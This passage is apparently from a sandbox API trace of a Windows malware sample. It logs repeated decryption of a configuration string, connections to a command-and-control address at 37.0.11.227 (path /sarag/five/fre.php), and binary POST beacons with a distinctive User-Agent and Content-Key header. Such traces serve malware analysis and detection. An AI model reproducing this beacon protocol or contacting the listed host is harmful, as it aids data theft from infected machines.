szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.352] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0230.368] GetProcessHeap () returned 0x690000 [0230.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0230.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.369] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.370] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.371] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.371] GetProcessHeap () returned 0x690000 [0230.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0230.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.374] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0230.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.375] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.376] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0230.376] GetProcessHeap () returned 0x690000 [0230.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0230.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.376] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0230.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.377] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0230.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.378] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0230.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.379] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0230.379] GetProcessHeap () returned 0x690000 [0230.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0230.379] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0230.379] GetProcessHeap () returned 0x690000 [0230.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0230.379] socket (af=2, type=1, protocol=6) returned 0x5f0 [0230.379] connect (s=0x5f0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0230.411] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0230.411] GetProcessHeap () returned 0x690000 [0230.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0230.411] GetProcessHeap () returned 0x690000 [0230.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0230.412] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0230.412] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0230.412] GetProcessHeap () returned 0x690000 [0230.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0230.412] GetProcessHeap () returned 0x690000 [0230.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0230.413] GetProcessHeap () returned 0x690000 [0230.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0230.413] GetProcessHeap () returned 0x690000 [0230.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0230.414] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0230.414] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0230.414] GetProcessHeap () returned 0x690000 [0230.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0230.414] GetProcessHeap () returned 0x690000 [0230.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0230.417] send (s=0x5f0, buf=0x6ad508*, len=242, flags=0) returned 242 [0230.417] send (s=0x5f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0230.417] GetProcessHeap () returned 0x690000 [0230.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0230.417] recv (in: s=0x5f0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0230.525] GetProcessHeap () returned 0x690000 [0230.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0230.525] GetProcessHeap () returned 0x690000 [0230.526] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0230.526] GetProcessHeap () returned 0x690000 [0230.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0230.530] GetProcessHeap () returned 0x690000 [0230.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0230.531] closesocket (s=0x5f0) returned 0 [0230.531] GetProcessHeap () returned 0x690000 [0230.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0230.531] GetProcessHeap () returned 0x690000 [0230.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0230.532] GetProcessHeap () returned 0x690000 [0230.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0230.532] GetProcessHeap () returned 0x690000 [0230.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0230.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfb0) returned 0x5f0 [0230.534] Sleep (dwMilliseconds=0xea60) [0230.535] GetProcessHeap () returned 0x690000 [0230.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0230.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.536] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0230.547] GetProcessHeap () returned 0x690000 [0230.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0230.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.548] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.549] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.551] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.551] GetProcessHeap () returned 0x690000 [0230.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0230.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.552] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0230.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.553] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.554] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0230.554] GetProcessHeap () returned 0x690000 [0230.554] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0230.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.555] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.556] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.556] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.557] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.557] GetProcessHeap () returned 0x690000 [0230.557] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0230.557] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.557] GetProcessHeap () returned 0x690000 [0230.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0230.558] GetProcessHeap () returned 0x690000 [0230.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0230.558] GetProcessHeap () returned 0x690000 [0230.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0230.558] GetProcessHeap () returned 0x690000 [0230.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0230.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.560] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.565] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0230.589] GetProcessHeap () returned 0x690000 [0230.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0230.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.593] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.593] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.594] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.594] GetProcessHeap () returned 0x690000 [0230.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0230.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.596] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0230.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.608] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.610] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0230.610] GetProcessHeap () returned 0x690000 [0230.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0230.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.611] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0230.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.612] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0230.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.613] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0230.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.614] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0230.614] GetProcessHeap () returned 0x690000 [0230.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0230.614] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0230.614] GetProcessHeap () returned 0x690000 [0230.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0230.614] socket (af=2, type=1, protocol=6) returned 0x5f4 [0230.614] connect (s=0x5f4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0230.639] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0230.640] GetProcessHeap () returned 0x690000 [0230.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0230.640] GetProcessHeap () returned 0x690000 [0230.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0230.640] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0230.641] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0230.641] GetProcessHeap () returned 0x690000 [0230.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0230.641] GetProcessHeap () returned 0x690000 [0230.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0230.642] GetProcessHeap () returned 0x690000 [0230.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0230.642] GetProcessHeap () returned 0x690000 [0230.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0230.644] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0230.644] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0230.644] GetProcessHeap () returned 0x690000 [0230.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0230.644] GetProcessHeap () returned 0x690000 [0230.645] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0230.645] send (s=0x5f4, buf=0x6ad508*, len=242, flags=0) returned 242 [0230.645] send (s=0x5f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0230.645] GetProcessHeap () returned 0x690000 [0230.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0230.646] recv (in: s=0x5f4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0230.742] GetProcessHeap () returned 0x690000 [0230.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0230.743] GetProcessHeap () returned 0x690000 [0230.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0230.743] GetProcessHeap () returned 0x690000 [0230.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0230.743] GetProcessHeap () returned 0x690000 [0230.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0230.744] closesocket (s=0x5f4) returned 0 [0230.744] GetProcessHeap () returned 0x690000 [0230.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0230.744] GetProcessHeap () returned 0x690000 [0230.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0230.745] GetProcessHeap () returned 0x690000 [0230.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0230.745] GetProcessHeap () returned 0x690000 [0230.745] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0230.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13c) returned 0x5f4 [0230.748] Sleep (dwMilliseconds=0xea60) [0230.749] GetProcessHeap () returned 0x690000 [0230.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0230.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.750] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.757] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0230.761] GetProcessHeap () returned 0x690000 [0230.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0230.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.762] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.763] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.765] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.765] GetProcessHeap () returned 0x690000 [0230.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0230.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.793] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0230.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.794] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.795] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0230.795] GetProcessHeap () returned 0x690000 [0230.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0230.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.831] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.832] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.833] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.833] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.833] GetProcessHeap () returned 0x690000 [0230.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0230.833] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.834] GetProcessHeap () returned 0x690000 [0230.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0230.835] GetProcessHeap () returned 0x690000 [0230.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0230.835] GetProcessHeap () returned 0x690000 [0230.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0230.836] GetProcessHeap () returned 0x690000 [0230.836] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0230.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.863] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0230.868] GetProcessHeap () returned 0x690000 [0230.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0230.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.869] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.870] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.871] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.871] GetProcessHeap () returned 0x690000 [0230.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0230.872] 